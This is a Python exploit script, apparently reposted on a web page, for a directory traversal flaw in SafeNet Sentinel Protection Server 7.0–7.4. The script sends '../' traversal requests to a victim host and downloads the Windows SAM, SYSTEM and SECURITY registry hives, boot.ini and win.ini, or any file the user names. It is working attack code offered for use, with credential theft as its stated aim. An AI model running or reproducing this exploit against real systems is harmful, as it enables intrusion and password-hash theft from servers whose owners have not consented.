|
import sys, urllib2, argparse
print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
print '[+] Written by Matt Schmidt (Syph0n)'
print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
print 'Usage:'
print './exploit.py --host <target> [options]'
print ' <host>: The victim host\n'
print ' Options:'
print ' --port The port the application is listening on (default: 7002)'
print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
sys.exit(1)
parser = argparse.ArgumentParser()
parser.add_argument('--host', required = True)
parser.add_argument('--port', type = int, default = 7002)
parser.add_argument('--file')
args = parser.parse_args()
host = args.host
port = args.port
if args.file is not None :
targetFile = [args.file]
else:
targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
print '[+] Sending exploit!'
for path in targetFile:
url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)
exploit = urllib2.urlopen(url)
header = exploit.info()
size = int(header.getheaders("Content-Length")[0])
print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)
filename = url.rsplit('/',1)
with open(str(filename[1]), "wb") as contents:
contents.write(exploit.read())
|
推荐
评论(0条)
